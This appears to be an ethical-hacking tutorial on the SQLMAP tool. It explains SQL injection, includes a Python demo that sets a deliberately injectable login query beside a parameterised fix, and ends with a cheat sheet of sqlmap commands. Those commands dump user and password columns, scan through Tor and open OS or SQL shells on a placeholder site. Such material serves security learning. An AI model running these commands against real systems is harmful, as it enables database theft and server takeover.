In the field of ethical hacking, SQLMAP is the predominant tool for finding SQL injection vulnerabilities. It is an open source solution written in Python that automates the process of detecting and exploiting SQL injection flaws, with the ultimate goal of taking full control of the database and of the server that hosts it.
It includes several functions such as database fingerprinting, data retrieval and operating system command execution. The SQLMAP tool can be used for the following purposes:
- Checking a web application for SQL injection vulnerabilities
- Exploiting a SQL injection vulnerability
- Extracting data from the database and its users
- Bypassing a Web Application Firewall (WAF)
- Taking full control of the underlying operating system
Some of the most important features of SQLMAP are shown below:
- It supports MySQL, Oracle, PostgreSQL, Microsoft Access, Microsoft SQL Server, IBM DB2, SQLite, Firebird and Sybase.
- It supports six different SQL injection techniques: boolean-based blind, error-based, UNION query, time-based blind, stacked queries and out-of-band.
- It supports cracking hashed passwords with a dictionary attack.
- It allows enumeration of users, password hashes, roles, permissions, databases, tables and columns.
What is SQL injection?
SQL injection is a hacking technique in which the attacker, by modifying the URL or some other text input field of the web application, can send SQL commands directly to the database. This bypasses the application's security controls, and as a result the attacker can extract data from the entire database, modify it and even delete it.
It is one of the oldest and most dangerous attacks on web applications. OWASP (Open Web Application Security Project) ranks injection threats at number one on the list of Top 10 Web Application Security Threats (OWASP Top 10).
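To make the mechanism concrete, here is an added example (not part of the original article) in Python, the language SQLMAP itself is written in. A login check that builds its query by string formatting is shown next to the same check written with parameterised queries, both run against a constructed in-memory SQLite table; the table, the credentials and the test input are all constructed for this demo.

```python
import sqlite3


def make_db():
    # Constructed in-memory database standing in for a web application's users table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    # Vulnerable: user input is pasted straight into the SQL text, so a quote
    # character in the input changes the structure of the query itself.
    sql = (
        "SELECT COUNT(*) FROM users WHERE username = '%s' AND password = '%s'"
        % (username, password)
    )
    return conn.execute(sql).fetchone()[0] > 0


def login_safe(conn, username, password):
    # Hardened: placeholders pass the values to the driver separately from the
    # query text, so they are always treated as data and never as SQL.
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0


def demo():
    # Returns the outcome of each login variant for a correct password and for
    # the classic tautology input that a scanner such as SQLMAP probes with.
    conn = make_db()
    tautology = "' OR '1'='1"  # constructed input: turns the WHERE clause into "always true"
    return {
        "vuln_correct": login_vulnerable(conn, "admin", "s3cret"),
        "vuln_injected": login_vulnerable(conn, "admin", tautology),
        "safe_correct": login_safe(conn, "admin", "s3cret"),
        "safe_injected": login_safe(conn, "admin", tautology),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {'login accepted' if ok else 'login rejected'}")
```

Only the vulnerable variant accepts the injected input; the parameterised query rejects it because the quote never reaches the SQL parser as syntax.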
How to use it
The first step you should take is to download the Python interpreter (if you don't already have it), since the tool is written in Python. You can download the latest version from here (v 3.8.0).
After you have successfully installed Python, follow these steps:
- Download the zip file from the SQLMAP website.
- Unzip the folder and its contents to the desired location.
- Open a cmd console and navigate to the location where you unzipped the folder in the previous step.
- Run sqlmap.py and see all the available options.
- You are ready.
In almost all Linux distros Python is installed by default. If you're not sure, open a terminal and type `python --version`. If Python is installed, the command will show you the version.
Then run the following commands to complete the installation of the tool:
```bash
sudo apt-get install git
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
cd sqlmap-dev
python sqlmap.py
```
The last command will display on our screen something like the following:
How to use it
Here are some basic commands you can use with SQLMAP and their description:

| Command | Description |
|---|---|
| `sqlmap -u "http://site.com/login.php"` | Simple check of a specific URL |
| `sqlmap -u "http://site.com/login.php" --tor --tor-type=SOCKS5` | Check through Tor |
| `sqlmap -u "http://site.com/login.php" --time-sec 20` | Check with the time-based blind delay set to 20 seconds |
| `sqlmap -u "http://site.com/login.php" --dbs` | List all databases of the web application |
| `sqlmap -u "http://site.com/login.php" -D site_db --tables` | List the tables of a specific database |
| `sqlmap -u "http://site.com/login.php" -D site_db -T users --dump` | Dump the contents of a specific table |
| `sqlmap -u "http://site.com/login.php" -D site_db -T users --columns` | List all columns of a table |
| `sqlmap -u "http://site.com/login.php" -D site_db -T users -C username,password --dump` | Dump specific columns of a table |
| `sqlmap -u "http://site.com/login.php" --method POST --data "username=admin&password=admin&submit=Submit" -D social_mccodes -T users --dump` | Dump a table when we have the admin login credentials (sent as POST data) |
| `sqlmap --dbms=mysql -u "http://site.com/login.php" --os-shell` | Get an operating system shell |
| `sqlmap --dbms=mysql -u "http://site.com/login.php" --sql-shell` | Get an interactive SQL shell |
You can find a more detailed cheat sheet for SQLMAP here.
We look forward to your comments ...